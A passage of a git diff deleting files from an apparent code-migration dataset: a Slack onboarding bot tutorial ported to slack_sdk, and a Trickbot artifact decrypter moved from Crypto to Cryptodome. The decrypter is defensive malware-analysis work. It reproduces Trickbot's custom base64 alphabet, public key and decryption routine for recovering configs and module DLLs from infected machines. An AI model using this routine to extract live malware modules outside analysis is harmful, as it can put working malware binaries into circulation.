-# Here we'll link the update_pin callback to the 'pin_added' event.
-@slack_events_adapter.on("pin_added")
-def update_pin(payload):
-    """Update the onboarding welcome message after receiving a "pin_added"
-    event from Slack. Update timestamp for welcome message as well.
-    """
-    event = payload.get("event", {})
-
-    channel_id = event.get("channel_id")
-    user_id = event.get("user")
-
-    # Get the original tutorial sent.
-    onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id]
-
-    # Mark the pin task as completed.
-    onboarding_tutorial.pin_task_completed = True
-
-    # Get the new message payload
-    message = onboarding_tutorial.get_message_payload()
-
-    # Post the updated message in Slack
-    updated_message = slack_web_client.chat_update(**message)
-
-    # Update the timestamp saved on the onboarding tutorial object
-    onboarding_tutorial.timestamp = updated_message["ts"]
-
-
-# ============== Message Events ============= #
-# When a user sends a DM, the event type will be 'message'.
-# Here we'll link the message callback to the 'message' event.
-@slack_events_adapter.on("message")
-def message(payload):
-    """Display the onboarding welcome message after receiving a message
-    that contains "start".
- """ - event = payload.get("event", {}) - - channel_id = event.get("channel") - user_id = event.get("user") - text = event.get("text") - - - if text and text.lower() == "start": - return start_onboarding(user_id, channel_id) - - -if __name__ == "__main__": - logger = logging.getLogger() - logger.setLevel(logging.DEBUG) - logger.addHandler(logging.StreamHandler()) - app.run(port=3000) diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff deleted file mode 100644 index d255d1d..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.diff +++ /dev/null @@ -1,68 +0,0 @@ -diff --git a/tutorial/PythOnBoardingBot/async_app.py b/tutorial/PythOnBoardingBot/async_app.py - index 2defee516b105112af592dc545a376a893345002..5f4d92a8048814fc4938753594e74d7cfc74c27a 100644 - --- a/tutorial/PythOnBoardingBot/async_app.py - +++ b/tutorial/PythOnBoardingBot/async_app.py -@@ -4,7 +4,8 @@ import asyncio - import ssl as ssl_lib - - import certifi --import slack -+from slack_sdk.web import WebClient -+from slack_sdk.rtm import RTMClient - - from onboarding_tutorial import OnboardingTutorial - -@@ -15,7 +16,7 @@ from onboarding_tutorial import OnboardingTutorial - onboarding_tutorials_sent = {} - - --async def start_onboarding(web_client: slack.WebClient, user_id: str, channel: str): -+async def start_onboarding(web_client: WebClient, user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - -@@ -39,7 +40,7 @@ async def start_onboarding(web_client: slack.WebClient, user_id: str, channel: s - # ================ Team Join Event =============== # - # When the user first joins a team, the type of the event will be 'team_join'. - # Here we'll link the onboarding_message callback to the 'team_join' event. --@slack.RTMClient.run_on(event="team_join") -+@RTMClient.run_on(event="team_join") - async def onboarding_message(**payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. -@@ -62,7 +63,7 @@ async def onboarding_message(**payload): - # When a users adds an emoji reaction to the onboarding message, - # the type of the event will be 'reaction_added'. - # Here we'll link the update_emoji callback to the 'reaction_added' event. --@slack.RTMClient.run_on(event="reaction_added") -+@RTMClient.run_on(event="reaction_added") - async def update_emoji(**payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. -@@ -91,7 +92,7 @@ async def update_emoji(**payload): - # =============== Pin Added Events ================ # - # When a users pins a message the type of the event will be 'pin_added'. - # Here we'll link the update_pin callback to the 'reaction_added' event. --@slack.RTMClient.run_on(event="pin_added") -+@RTMClient.run_on(event="pin_added") - async def update_pin(**payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. -@@ -120,7 +121,7 @@ async def update_pin(**payload): - # ============== Message Events ============= # - # When a user sends a DM, the event type will be 'message'. - # Here we'll link the message callback to the 'message' event. 
--@slack.RTMClient.run_on(event="message") -+@RTMClient.run_on(event="message") - async def message(**payload): - """Display the onboarding welcome message after receiving a message - that contains "start". -@@ -143,7 +144,7 @@ if __name__ == "__main__": - slack_token = os.environ["SLACK_BOT_TOKEN"] - loop = asyncio.new_event_loop() - asyncio.set_event_loop(loop) -- rtm_client = slack.RTMClient( -+ rtm_client = RTMClient( - token=slack_token, ssl=ssl_context, run_async=True, loop=loop - ) - loop.run_until_complete(rtm_client.start()) diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py deleted file mode 100644 index daf1549..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.source.py +++ /dev/null @@ -1,149 +0,0 @@ -import os -import logging -import asyncio -import ssl as ssl_lib - -import certifi -import slack - -from onboarding_tutorial import OnboardingTutorial - -"""This file serves as an example for how to create the same app, but running asynchronously.""" - -# For simplicity we'll store our app data in-memory with the following data structure. -# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}} -onboarding_tutorials_sent = {} - - -async def start_onboarding(web_client: slack.WebClient, user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - - # Get the onboarding message payload - message = onboarding_tutorial.get_message_payload() - - # Post the onboarding message in Slack - response = await web_client.chat_postMessage(**message) - - # Capture the timestamp of the message we've just posted so - # we can use it to update the message after a user - # has completed an onboarding task. - onboarding_tutorial.timestamp = response["ts"] - - # Store the message sent in onboarding_tutorials_sent - if channel not in onboarding_tutorials_sent: - onboarding_tutorials_sent[channel] = {} - onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial - - -# ================ Team Join Event =============== # -# When the user first joins a team, the type of the event will be 'team_join'. -# Here we'll link the onboarding_message callback to the 'team_join' event. -@slack.RTMClient.run_on(event="team_join") -async def onboarding_message(**payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. - """ - # Get WebClient so you can communicate back to Slack. - web_client = payload["web_client"] - - # Get the id of the Slack user associated with the incoming event - user_id = payload["data"]["user"]["id"] - - # Open a DM with the new user. - response = web_client.im_open(user_id) - channel = response["channel"]["id"] - - # Post the onboarding message. - await start_onboarding(web_client, user_id, channel) - - -# ============= Reaction Added Events ============= # -# When a users adds an emoji reaction to the onboarding message, -# the type of the event will be 'reaction_added'. -# Here we'll link the update_emoji callback to the 'reaction_added' event. -@slack.RTMClient.run_on(event="reaction_added") -async def update_emoji(**payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. 
- """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["item"]["channel"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the reaction task as completed. - onboarding_tutorial.reaction_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# =============== Pin Added Events ================ # -# When a users pins a message the type of the event will be 'pin_added'. -# Here we'll link the update_pin callback to the 'reaction_added' event. -@slack.RTMClient.run_on(event="pin_added") -async def update_pin(**payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["channel_id"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the pin task as completed. - onboarding_tutorial.pin_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# ============== Message Events ============= # -# When a user sends a DM, the event type will be 'message'. -# Here we'll link the message callback to the 'message' event. -@slack.RTMClient.run_on(event="message") -async def message(**payload): - """Display the onboarding welcome message after receiving a message - that contains "start". 
- """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data.get("channel") - user_id = data.get("user") - text = data.get("text") - - if text and text.lower() == "start": - return await start_onboarding(web_client, user_id, channel_id) - - -if __name__ == "__main__": - logger = logging.getLogger() - logger.setLevel(logging.DEBUG) - logger.addHandler(logging.StreamHandler()) - ssl_context = ssl_lib.create_default_context(cafile=certifi.where()) - slack_token = os.environ["SLACK_BOT_TOKEN"] - loop = asyncio.new_event_loop() - asyncio.set_event_loop(loop) - rtm_client = slack.RTMClient( - token=slack_token, ssl=ssl_context, run_async=True, loop=loop - ) - loop.run_until_complete(rtm_client.start()) diff --git a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py b/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py deleted file mode 100644 index ecf153f..0000000 --- a/v1/data/codefile/slackapi@python-slack-sdk__5f4d92a__tutorial$PythOnBoardingBot$async_app.py.target.py +++ /dev/null @@ -1,150 +0,0 @@ -import os -import logging -import asyncio -import ssl as ssl_lib - -import certifi -from slack_sdk.web import WebClient -from slack_sdk.rtm import RTMClient - -from onboarding_tutorial import OnboardingTutorial - -"""This file serves as an example for how to create the same app, but running asynchronously.""" - -# For simplicity we'll store our app data in-memory with the following data structure. -# onboarding_tutorials_sent = {"channel": {"user_id": OnboardingTutorial}} -onboarding_tutorials_sent = {} - - -async def start_onboarding(web_client: WebClient, user_id: str, channel: str): - # Create a new onboarding tutorial. - onboarding_tutorial = OnboardingTutorial(channel) - - # Get the onboarding message payload - message = onboarding_tutorial.get_message_payload() - - # Post the onboarding message in Slack - response = await web_client.chat_postMessage(**message) - - # Capture the timestamp of the message we've just posted so - # we can use it to update the message after a user - # has completed an onboarding task. - onboarding_tutorial.timestamp = response["ts"] - - # Store the message sent in onboarding_tutorials_sent - if channel not in onboarding_tutorials_sent: - onboarding_tutorials_sent[channel] = {} - onboarding_tutorials_sent[channel][user_id] = onboarding_tutorial - - -# ================ Team Join Event =============== # -# When the user first joins a team, the type of the event will be 'team_join'. -# Here we'll link the onboarding_message callback to the 'team_join' event. -@RTMClient.run_on(event="team_join") -async def onboarding_message(**payload): - """Create and send an onboarding welcome message to new users. Save the - time stamp of this message so we can update this message in the future. - """ - # Get WebClient so you can communicate back to Slack. - web_client = payload["web_client"] - - # Get the id of the Slack user associated with the incoming event - user_id = payload["data"]["user"]["id"] - - # Open a DM with the new user. - response = web_client.im_open(user_id) - channel = response["channel"]["id"] - - # Post the onboarding message. - await start_onboarding(web_client, user_id, channel) - - -# ============= Reaction Added Events ============= # -# When a users adds an emoji reaction to the onboarding message, -# the type of the event will be 'reaction_added'. -# Here we'll link the update_emoji callback to the 'reaction_added' event. 
-@RTMClient.run_on(event="reaction_added") -async def update_emoji(**payload): - """Update the onboarding welcome message after receiving a "reaction_added" - event from Slack. Update timestamp for welcome message as well. - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["item"]["channel"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the reaction task as completed. - onboarding_tutorial.reaction_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# =============== Pin Added Events ================ # -# When a users pins a message the type of the event will be 'pin_added'. -# Here we'll link the update_pin callback to the 'reaction_added' event. -@RTMClient.run_on(event="pin_added") -async def update_pin(**payload): - """Update the onboarding welcome message after receiving a "pin_added" - event from Slack. Update timestamp for welcome message as well. - """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data["channel_id"] - user_id = data["user"] - - # Get the original tutorial sent. - onboarding_tutorial = onboarding_tutorials_sent[channel_id][user_id] - - # Mark the pin task as completed. - onboarding_tutorial.pin_task_completed = True - - # Get the new message payload - message = onboarding_tutorial.get_message_payload() - - # Post the updated message in Slack - updated_message = await web_client.chat_update(**message) - - # Update the timestamp saved on the onboarding tutorial object - onboarding_tutorial.timestamp = updated_message["ts"] - - -# ============== Message Events ============= # -# When a user sends a DM, the event type will be 'message'. -# Here we'll link the message callback to the 'message' event. -@RTMClient.run_on(event="message") -async def message(**payload): - """Display the onboarding welcome message after receiving a message - that contains "start". 
- """ - data = payload["data"] - web_client = payload["web_client"] - channel_id = data.get("channel") - user_id = data.get("user") - text = data.get("text") - - if text and text.lower() == "start": - return await start_onboarding(web_client, user_id, channel_id) - - -if __name__ == "__main__": - logger = logging.getLogger() - logger.setLevel(logging.DEBUG) - logger.addHandler(logging.StreamHandler()) - ssl_context = ssl_lib.create_default_context(cafile=certifi.where()) - slack_token = os.environ["SLACK_BOT_TOKEN"] - loop = asyncio.new_event_loop() - asyncio.set_event_loop(loop) - rtm_client = RTMClient( - token=slack_token, ssl=ssl_context, run_async=True, loop=loop - ) - loop.run_until_complete(rtm_client.start()) diff --git a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff b/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff deleted file mode 100644 index 21cbbc6..0000000 --- a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.diff +++ /dev/null @@ -1,43 +0,0 @@ -diff --git a/trickbot/trickbot_artifact_decrypter.py b/trickbot/trickbot_artifact_decrypter.py - index e832d724b5f7af7a734815796de8eea919de1635..02b064b4acc0ae26d6c61246ab3f1f45b750091a 100644 - --- a/trickbot/trickbot_artifact_decrypter.py - +++ b/trickbot/trickbot_artifact_decrypter.py -@@ -7,11 +7,11 @@ import os - import struct - import sys - --# run "python3 -m pip install -r requirements.txt" if you are missing these --from Crypto.Cipher import AES --from Crypto.Hash import SHA256, SHA384 --from Crypto.PublicKey import ECC --from Crypto.Signature import DSS -+# run "sudo -H python3 -m pip install -r requirements.txt" if you are missing these -+from Cryptodome.Cipher import AES -+from Cryptodome.Hash import SHA256, SHA384 -+from Cryptodome.PublicKey import ECC -+from Cryptodome.Signature import DSS - - logging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr) - log = logging.getLogger() -@@ -162,12 +162,15 @@ def probe_config_file(filepath, dumpdir): - data = xor(base64_decode(line, b64alphabet), bot_key) - config = decrypt_data(data) - elif group_tag and client_id and config: -- log.info(' [+] Group tag: %r', group_tag) -- log.info(' [+] Client ID: %r', client_id) -- log.info(' [+] Configuration: %r', config.decode()) -- with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: -- f.write(config) -- return bot_key -+ break -+ -+ if group_tag and client_id and config: -+ log.info(' [+] Group tag: %r', group_tag) -+ log.info(' [+] Client ID: %r', client_id) -+ log.info(' [+] Configuration: %r', config.decode()) -+ with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: -+ f.write(config) -+ return bot_key - - return None - diff --git a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py b/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py deleted file mode 100644 index e0e68e2..0000000 --- a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.source.py +++ /dev/null @@ -1,286 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import base64 -import itertools -import logging -import os -import struct -import sys - -# run "python3 -m pip install -r requirements.txt" if you are missing these -from Crypto.Cipher import AES -from Crypto.Hash import SHA256, SHA384 -from Crypto.PublicKey import ECC -from Crypto.Signature import DSS - 
-logging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr) -log = logging.getLogger() - -BASE64_STANDARD = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' -BASE64_CUSTOM = b'HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT' - -ECC_KEY = '''-----BEGIN PUBLIC KEY----- -MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE8yCG2yBN8HM3tfsYsMCvgLvz+/FKwDvG -AB8j7xxMBlSjj6YZfEFX6wu8f0GhWHlwDcOhOBxe4nrRKfu2VUHVjsfHPh7ztGdj -01D1W1/RwFa4OIfbtUTX4Th5PmMrAy7I ------END PUBLIC KEY----- -''' - -verifier = DSS.new(ECC.import_key(ECC_KEY), 'fips-186-3') - - -def derive_key(rounds, data): - h = SHA256.new() - for _ in range(rounds): - h.update(data) - data = h.digest() - return data - - -def decrypt_data(data): - if data is None: - return None - - key = derive_key(128, data[:0x20])[:0x20] - iv = derive_key(128, data[0x10:0x30])[:0x10] - cipher = AES.new(key, AES.MODE_CBC, iv) - - def pad(s): - return s + (-len(s) % 16) * bytes([-len(s) % 16]) - - data = pad(data[0x30:]) - data = cipher.decrypt(data) - - if len(data) >= 8: - size, _ = struct.unpack_from('=II', data) - signature = data[size+0x08:size+0x68] - data = data[:size+0x08] - try: - verifier.verify(SHA384.new(data), signature) - except ValueError: - log.warning('[!] WARNING: Bad public key signature') - data = data[0x08:] - - return data - - -def xor(data, key): - return bytes([data[i] ^ key[i % len(key)] for i in range(len(data))]) - - -def calc_checksum(data): - x = 0 - for b in data: - x = (x + b) & 0xffffffff - x = (x + ((x << 10) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 6) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 3) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 11) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 15) & 0xffffffff)) & 0xffffffff - return x - - -def base64_encode(data, alphabet): - return base64.b64encode(data).translate(bytes.maketrans(BASE64_STANDARD, alphabet)).rstrip(b'=') - - -def base64_decode(data, alphabet): - return base64.b64decode((data + b'==').translate(bytes.maketrans(alphabet, BASE64_STANDARD))) - - -def find_b64alphabet(data): - b64alphabet = bytearray(BASE64_CUSTOM) - - for i in itertools.permutations(b64alphabet[-9:]): - b64alphabet[-9:] = bytearray(i) - x = base64_decode(data, b64alphabet) - if len(x) <= 64: - continue - - items = x.split(b' ') - if len(items) != 5: - continue - if len(items[0]) != 64: - continue - if not all(_ in b'0123456789ABCDEF' for _ in items[0]): - continue - if not all(_ in b'0123456789' for _ in items[1]): - continue - if not all(_ in b'0123456789' for _ in items[2]): - continue - if not all(_ in b'0123456789' for _ in items[3]): - continue - if not all(_ in b'0123456789' for _ in items[4]): - continue - - if int(items[1]) != calc_checksum(base64_encode(bytes(range(256)), b64alphabet)): - continue - - return bytes(b64alphabet), items[0], int(items[2]), int(items[3]), int(items[4]) - - return None - - -def probe_config_file(filepath, dumpdir): - group_tag = None - client_id = None - config = None - - items = None - b64alphabet = None - bot_key = None - ln_group_tag = None - ln_client_id = None - ln_config = None - - linenum = 0 - with open(filepath, 'rb') as f: - for line in f: - linenum += 1 - line = line.strip().split(b'=', 1)[-1].translate(None, b' ') - if not all(_ in (BASE64_STANDARD + b'=') for _ in line): - continue - - if not items: - if len(line) < 96: - continue - items = find_b64alphabet(line) - if not items: - continue - b64alphabet, bot_key, ln_group_tag, ln_client_id, ln_config = items - log.info('[+] Found config file: %r', 
filepath) - log.info(' [+] Base64 alphabet: %r', b64alphabet.decode()) - log.info(' [+] Bot ID: %r', bot_key.decode()) - linenum = 0 - elif linenum == ln_group_tag: - data = xor(base64_decode(line, b64alphabet), bot_key) - group_tag = data.decode('utf-16le') - elif linenum == ln_client_id: - data = xor(base64_decode(line, b64alphabet), bot_key) - client_id = data.decode('utf-16le') - elif linenum == ln_config: - data = xor(base64_decode(line, b64alphabet), bot_key) - config = decrypt_data(data) - elif group_tag and client_id and config: - log.info(' [+] Group tag: %r', group_tag) - log.info(' [+] Client ID: %r', client_id) - log.info(' [+] Configuration: %r', config.decode()) - with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: - f.write(config) - return bot_key - - return None - - -def decrypt_module_configs(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - - log.info('[+] Found module config: %r', path) - - outfile = os.path.join(dumpdir, '{}_{}.xml'.format(os.path.basename(directory).rsplit('_', 1)[0], entry)) - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def decrypt_modules(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - if not entry.endswith(('32', '64')): - continue - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - if not decrypted.startswith(b'MZ'): - continue - - log.info('[+] Found module binary: %r', path) - - outfile = os.path.join(dumpdir, entry + '.dll') - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - try: - numfiles += decrypt_module_configs(bot_key, os.path.join(directory, entry + '_configs'), dumpdir) - except FileNotFoundError: - continue - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def main(): - parser = argparse.ArgumentParser(description='Decrypts and dumps various artifacts (current configuration, modules and module configurations) from a computer infected with Trickbot') - parser.add_argument('directory', nargs='?', default='.', help='Trickbot malware directory') - parser.add_argument('-d', '--dumpdir', default='decrypted', help='Dump directory for the decrypted files') - args = parser.parse_args() - - args.dumpdir = os.path.abspath(args.dumpdir) - os.makedirs(args.dumpdir, exist_ok=True) - - numfiles = 0 - bot_key = None - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isfile(path): - continue - if os.path.samefile(path, sys.argv[0]): - continue - - log.info('[?] Probing config file: %r', path) - bot_key = probe_config_file(path, args.dumpdir) - if bot_key: - numfiles += 1 - break - - if not bot_key: - log.error('[!] 
ERROR: Failed to find bot key') - return - - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isdir(path): - continue - if os.path.samefile(path, args.dumpdir): - continue - - try: - numfiles += decrypt_modules(bot_key, path, args.dumpdir) - break - except FileNotFoundError: - continue - - if numfiles > 0: - log.info('[+] Saved %d decrypted file(s) to: %r', numfiles, args.dumpdir) - else: - log.error('[!] ERROR: Failed to decrypt any files') - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py b/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py deleted file mode 100644 index 7d824e7..0000000 --- a/v1/data/codefile/snemes@malware-analysis__02b064b__trickbot$trickbot_artifact_decrypter.py.target.py +++ /dev/null @@ -1,289 +0,0 @@ -#!/usr/bin/env python3 -import argparse -import base64 -import itertools -import logging -import os -import struct -import sys - -# run "sudo -H python3 -m pip install -r requirements.txt" if you are missing these -from Cryptodome.Cipher import AES -from Cryptodome.Hash import SHA256, SHA384 -from Cryptodome.PublicKey import ECC -from Cryptodome.Signature import DSS - -logging.basicConfig(format='%(message)s', level=logging.INFO, stream=sys.stderr) -log = logging.getLogger() - -BASE64_STANDARD = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' -BASE64_CUSTOM = b'HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT' - -ECC_KEY = '''-----BEGIN PUBLIC KEY----- -MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE8yCG2yBN8HM3tfsYsMCvgLvz+/FKwDvG -AB8j7xxMBlSjj6YZfEFX6wu8f0GhWHlwDcOhOBxe4nrRKfu2VUHVjsfHPh7ztGdj -01D1W1/RwFa4OIfbtUTX4Th5PmMrAy7I ------END PUBLIC KEY----- -''' - -verifier = DSS.new(ECC.import_key(ECC_KEY), 'fips-186-3') - - -def derive_key(rounds, data): - h = SHA256.new() - for _ in range(rounds): - h.update(data) - data = h.digest() - return data - - -def decrypt_data(data): - if data is None: - return None - - key = derive_key(128, data[:0x20])[:0x20] - iv = derive_key(128, data[0x10:0x30])[:0x10] - cipher = AES.new(key, AES.MODE_CBC, iv) - - def pad(s): - return s + (-len(s) % 16) * bytes([-len(s) % 16]) - - data = pad(data[0x30:]) - data = cipher.decrypt(data) - - if len(data) >= 8: - size, _ = struct.unpack_from('=II', data) - signature = data[size+0x08:size+0x68] - data = data[:size+0x08] - try: - verifier.verify(SHA384.new(data), signature) - except ValueError: - log.warning('[!] 
WARNING: Bad public key signature') - data = data[0x08:] - - return data - - -def xor(data, key): - return bytes([data[i] ^ key[i % len(key)] for i in range(len(data))]) - - -def calc_checksum(data): - x = 0 - for b in data: - x = (x + b) & 0xffffffff - x = (x + ((x << 10) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 6) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 3) & 0xffffffff)) & 0xffffffff - x = (x ^ ((x >> 11) & 0xffffffff)) & 0xffffffff - x = (x + ((x << 15) & 0xffffffff)) & 0xffffffff - return x - - -def base64_encode(data, alphabet): - return base64.b64encode(data).translate(bytes.maketrans(BASE64_STANDARD, alphabet)).rstrip(b'=') - - -def base64_decode(data, alphabet): - return base64.b64decode((data + b'==').translate(bytes.maketrans(alphabet, BASE64_STANDARD))) - - -def find_b64alphabet(data): - b64alphabet = bytearray(BASE64_CUSTOM) - - for i in itertools.permutations(b64alphabet[-9:]): - b64alphabet[-9:] = bytearray(i) - x = base64_decode(data, b64alphabet) - if len(x) <= 64: - continue - - items = x.split(b' ') - if len(items) != 5: - continue - if len(items[0]) != 64: - continue - if not all(_ in b'0123456789ABCDEF' for _ in items[0]): - continue - if not all(_ in b'0123456789' for _ in items[1]): - continue - if not all(_ in b'0123456789' for _ in items[2]): - continue - if not all(_ in b'0123456789' for _ in items[3]): - continue - if not all(_ in b'0123456789' for _ in items[4]): - continue - - if int(items[1]) != calc_checksum(base64_encode(bytes(range(256)), b64alphabet)): - continue - - return bytes(b64alphabet), items[0], int(items[2]), int(items[3]), int(items[4]) - - return None - - -def probe_config_file(filepath, dumpdir): - group_tag = None - client_id = None - config = None - - items = None - b64alphabet = None - bot_key = None - ln_group_tag = None - ln_client_id = None - ln_config = None - - linenum = 0 - with open(filepath, 'rb') as f: - for line in f: - linenum += 1 - line = line.strip().split(b'=', 1)[-1].translate(None, b' ') - if not all(_ in (BASE64_STANDARD + b'=') for _ in line): - continue - - if not items: - if len(line) < 96: - continue - items = find_b64alphabet(line) - if not items: - continue - b64alphabet, bot_key, ln_group_tag, ln_client_id, ln_config = items - log.info('[+] Found config file: %r', filepath) - log.info(' [+] Base64 alphabet: %r', b64alphabet.decode()) - log.info(' [+] Bot ID: %r', bot_key.decode()) - linenum = 0 - elif linenum == ln_group_tag: - data = xor(base64_decode(line, b64alphabet), bot_key) - group_tag = data.decode('utf-16le') - elif linenum == ln_client_id: - data = xor(base64_decode(line, b64alphabet), bot_key) - client_id = data.decode('utf-16le') - elif linenum == ln_config: - data = xor(base64_decode(line, b64alphabet), bot_key) - config = decrypt_data(data) - elif group_tag and client_id and config: - break - - if group_tag and client_id and config: - log.info(' [+] Group tag: %r', group_tag) - log.info(' [+] Client ID: %r', client_id) - log.info(' [+] Configuration: %r', config.decode()) - with open(os.path.join(dumpdir, 'config.xml'), 'wb') as f: - f.write(config) - return bot_key - - return None - - -def decrypt_module_configs(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - - log.info('[+] Found module config: %r', path) - - outfile = os.path.join(dumpdir, 
'{}_{}.xml'.format(os.path.basename(directory).rsplit('_', 1)[0], entry)) - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def decrypt_modules(bot_key, directory, dumpdir): - numfiles = 0 - for entry in os.listdir(directory): - if not entry.endswith(('32', '64')): - continue - path = os.path.join(directory, entry) - if not os.path.isfile(path): - continue - - with open(path, 'rb') as f: - data = f.read() - - decrypted = decrypt_data(xor(data, bot_key)) - if decrypted is None: - continue - if not decrypted.startswith(b'MZ'): - continue - - log.info('[+] Found module binary: %r', path) - - outfile = os.path.join(dumpdir, entry + '.dll') - with open(outfile, 'wb') as f: - f.write(decrypted) - numfiles += 1 - - try: - numfiles += decrypt_module_configs(bot_key, os.path.join(directory, entry + '_configs'), dumpdir) - except FileNotFoundError: - continue - - if numfiles == 0: - raise FileNotFoundError - - return numfiles - - -def main(): - parser = argparse.ArgumentParser(description='Decrypts and dumps various artifacts (current configuration, modules and module configurations) from a computer infected with Trickbot') - parser.add_argument('directory', nargs='?', default='.', help='Trickbot malware directory') - parser.add_argument('-d', '--dumpdir', default='decrypted', help='Dump directory for the decrypted files') - args = parser.parse_args() - - args.dumpdir = os.path.abspath(args.dumpdir) - os.makedirs(args.dumpdir, exist_ok=True) - - numfiles = 0 - bot_key = None - for entry in os.listdir(args.directory): - path = os.path.join(args.directory, entry) - if not os.path.isfile(path): - continue - if os.path.samefile(path, sys.argv[0]): - continue - - log.info('[?] Probing config file: %r', path) - bot_key = probe_config_file(path, args.dumpdir) - if bot_key: - numfiles += 1 - break - - if not bot_key: - log.error('[!] ERROR: Failed to find bot 